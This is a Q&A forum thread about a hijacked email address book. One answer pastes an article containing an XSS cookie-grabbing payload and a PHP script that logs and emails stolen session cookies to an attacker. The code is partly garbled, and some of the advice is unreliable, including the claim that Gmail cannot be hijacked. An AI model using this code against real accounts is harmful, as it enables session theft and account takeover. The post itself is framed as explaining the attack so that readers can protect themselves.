vtsztpu: Some spammer has hijacked my address book. Should I change my email account name and how do I do that?
What will happen to the old files in my current account if I change the name? Will they be lost?
Answers and Views:
Answer by *BlackxxxRosezxxx*
make a new email account and start a new one notify all of your contacts and tell them so they are aware..
1. Sighn up to google email and 2. Tell all you’re contacts and 3. Google Aka gmail is epic because no one can highjack it and second stay with gmailAnswer by Richard
This happened to me recently. They are using a security hole in the client side of the browser which allows a hacker to rewrite a cookie accessing your email contacts via PHP embedded in the email and is currently undetectable by Yahoo Mail. The IP address from the originating email for my case came from this IP address 183.89.26.154 (this can be found in the full email header) which I tracked it down to Thailand. The link sent out to all my contacts accesses a website in Poland (a fake Canadian Pharmacy page) which will grab more emails based on the PHP Script similar to that below.
I have currently deleted all my cookies and cleared all my saved passwords in Firefox and have also installed Spybot Search and Destroy since my virus scanner (Eset Smart Security) and MS Malicious Software Removal Tool didn’t find anything. After you do all the above, change your password and clear your cookies out frequently. Update: Also, DO NOT USE “KEEP ME SIGNED IN” check box by Yahoo when signing in, I believe this is “THE” problem based on the article I found below. Use Firefox browser’s way to store the passwords since they are not cookie based. Here is a copy and paste of what I found.
How hackers steal yahoo passwords
This article is ment to provide more info on how to protect your yahoo account and every account in general and should not be used for stealing someone’s info, password etc. It’s purely informative. My yahoo Id was recently accessed by an unknown person which used it to send promotional emails to my list of friends who, of course, accessed them leaving the hacker another open door, and another and so on, the chain never ends. Hopefully yahoo wakes up. I did a search on this new thing that they use, it had to be something on the “client side”, a bug that could be sent inside an email, a new thing, undetected by yahoo, yet – it’s easyer to attack than to deffend they say. It didn’t take me too much to find this code which writes the recipient’s cookie (stored in C:/ under the Cookies folder) inside a .log file that is copy-pasted by the hacker overwriting his own cookie that yahoo stored inside his computer and than easilly accessing the victim’s yahoo email. The bug:
<STYLE onload="window.status='';
var x = escape(document.cookie).substr(0,1900);
b.innerHTML='’;” type=text/css>
…which calls this php script:
$ file=”cookie.log”;
if (isset($ _REQUEST[“id”]) && isset($ _REQUEST[“cookie”])){
$ logcookie = $ _REQUEST[“cookie”];
$ logcookie = rawurldecode($ logcookie);
$ logemail = $ _REQUEST[“id”];
$ logemail = rawurldecode($ logemail);
if (file_exists($ file)) {
$ handle=fopen($ file, “r+”);
$ filecontence=fread($ handle,filesize(“…
fclose($ handle);
}
$ handle=fopen($ file, “w”);
fwrite($ handle, “$ logemail – $ logcookien$ filecontencen “);
//Writing email address and cookie then the rest of the log
fclose($ handle);
mail(“email”, “$ logemail”, “$ logemailn$ logcookien$ filecontencen”…
}
header(“Location: https://login.yahoo.com/config/login_verify2?&.src=ym”);
…which writes the cookie to the hackers .log file that resides on his server. A very simple example but so deadly. NOTE: The code is a little changed to make it hard to use without PHP knowledge. How to protect yourself? My advice: DON’T EVER OPEN EMAILS FROM AN UNKNOWN SENDER.
Leave a Reply